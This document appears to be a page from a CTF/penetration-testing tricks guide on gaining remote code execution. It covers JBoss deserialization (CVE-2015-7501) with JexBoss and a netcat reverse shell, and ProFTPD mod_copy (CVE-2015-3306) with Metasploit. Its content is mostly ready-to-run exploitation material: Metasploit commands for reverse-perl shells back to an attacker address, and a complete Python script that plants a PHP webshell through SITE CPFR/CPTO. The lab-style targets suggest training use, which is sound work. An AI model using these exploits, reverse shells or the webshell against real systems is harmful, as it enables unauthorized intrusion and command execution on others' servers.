> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/rce/initial-access-rce-vulnerability-exploitation.md).

# Vulnerability Exploitation

## JBoss Deserialization RCE (Cve-2015-7501)

Target JBoss instances potentially vulnerable to CVE-2015-7501 via the JMXInvokerServlet for RCE. JexBoss is a tool for testing and exploiting JBoss Application Server vulnerabilities, including Deserialization Remote Code Execution (CVE-2015-7501) via JMXInvokerServlet.

To install the tool, clone the repository and install dependencies:

```bash
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requirements.txt
```

Set up a netcat listener on your attacking machine first using `nc -lvnp <port>`. Use the `jexboss.py` tool to automate the exploitation. Execute the tool pointing to the target URL using the `-host` option.

```bash
python jexboss.py -host http://[Target_IP]:8080
```

When exploiting, the tool can establish a reverse shell. The tool will interactively prompt for your listener IP and port to establish the reverse shell connection back to your netcat listener.

***

## ProFTPD Mod\_Copy RCE (CVE-2015-3306)

Leverage the ProFTPD `mod_copy` module vulnerability (CVE-2015-3306) present in version 1.3.5 to achieve Remote Code Execution. This module exploits the ProFTPD 1.3.5 Mod\_Copy vulnerability which allows unauthenticated users to copy arbitrary files from any location to another. By copying a malicious file into the web root, an attacker can gain remote code execution. This exploit allows unauthenticated users to copy arbitrary files from any location to another, including a malicious payload script into a web-accessible directory for execution.

Use the Metasploit module `exploit/unix/ftp/proftpd_modcopy_exec`. Configure the target `RHOSTS`, the ProFTPD port (`RPORT_FTP`, typically 21), and importantly, set `SITEPATH` to the web root directory accessible via HTTP where the payload will be placed, and `TMPPATH` to a writable temporary directory on the target. Select a suitable payload like `cmd/unix/reverse_perl` and set your listener details (`LHOST`/`LPORT`).

Key options for the module include:

* `RHOSTS`: The target host(s).
* `RPORT`: The target HTTP port (typically 80), often needed for triggering execution via HTTP.
* `RPORT_FTP`: The target FTP port (typically 21).
* `SITEPATH`: The path to the web root, such as `/var/www/html`.
* `TARGETURI`: The path to trigger the execution, typically `/`.
* `TMPPATH`: The path to a writable temporary directory, such as `/tmp`.
* `FTPUSER`: The username to authenticate with (default: `anonymous`).
* `FTPPASS`: The password to authenticate with (default: `anonymous`).

```bash
use exploit/unix/ftp/proftpd_modcopy_exec
set RHOSTS target1.ine.local
set RPORT 80 # Often needed for triggering execution via HTTP
set RPORT_FTP 21
set SITEPATH /var/www/html # Web root
set TMPPATH /tmp # Writable temp directory
set TARGETURI /
set payload cmd/unix/reverse_perl
set LHOST 192.9.236.2
set LPORT 4444
run
```

The module handles the file copy via `SITE CPFR` and `SITE CPTO` commands and attempts to trigger execution. Ensure `SITEPATH` is correctly identified and writable by the FTP user, and that the target web server serves files from this location.

***

## ProFTPD mod\_copy RCE Metasploit

Exploiting the ProFTPD `mod_copy` vulnerability using Metasploit is straightforward as there is a dedicated module available. This exploit targets ProFTPD version 1.3.5 with the `mod_copy` module enabled. It typically works by leveraging the `SITE CPFR` and `SITE CPTO` commands permitted by `mod_copy` to copy a payload from a source (often internal or a temp file) to a web-accessible directory, which is then triggered via an HTTP request handled by the module. The vulnerability allows an unauthenticated user to copy files from any location to any other location on the server.

To use the Metasploit module, specify the target host, the web-accessible directory on the target server where the payload should be placed for execution, and the desired payload. The module defaults to using port 21 for the FTP connection. A writable directory on the target, typically the webroot, is required.

```bash
use exploit/unix/ftp/proftpd_modcopy_exec
set RHOSTS target1.ine.local
set PAYLOAD cmd/unix/reverse_perl
set TARGET_PATH /var/www/html
run
```

Alternatively, the vulnerability can be exploited using custom scripts that directly utilize the `SITE CPFR` and `SITE CPTO` commands. Below is an example of a Python script that exploits this vulnerability by copying `/proc/self/cmdline` to a temporary file in the webroot and appending a PHP webshell payload to it. This results in a PHP file in the webroot that executes system commands via the `cmd` GET parameter.

```python
#!/usr/bin/env python
#
# By: hd0y.
# ProFTPd 1.3.5 Remote Command Execution
# CVE-2015-3306
#

import sys
import ftplib

if len(sys.argv) != 4:
	print '[-] Usage: python '+sys.argv[0]+' <host> <port> <directory>'
	print '[-] Example: python '+sys.argv[0]+' 10.10.10.1 21 /var/www/html/'
	exit()

host = sys.argv[1]
port = int(sys.argv[2])
directory = sys.argv[3]

try:
	ftp = ftplib.FTP()
	ftp.connect(host, port)
	ftp.login()
	print '[+] Logged in anonymously'

	# Copy /proc/self/cmdline to a temporary file in the webroot
	ftp.sendcmd('SITE CPFR /proc/self/cmdline')
	resp = ftp.sendcmd('SITE CPTO ' + directory + '.<?php system($_GET[\'cmd\']); ?>.php')
	print '[+] File copied: ' + resp

	if 'Copy successful' in resp:
		print '[+] Exploit successful!'
		print '[+] Access the webshell at http://' + host + '/.<?php system($_GET[\'cmd\']); ?>.php?cmd=<command>'
	else:
		print '[-] Exploit failed.'

except Exception as e:
	print '[-] Error: ' + str(e)
```

This script connects to the FTP server, logs in anonymously, and then uses `SITE CPFR` to specify `/proc/self/cmdline` as the source and `SITE CPTO` to specify the destination path within the web directory, appending the PHP payload. If the copy is successful, a webshell is created allowing remote command execution.
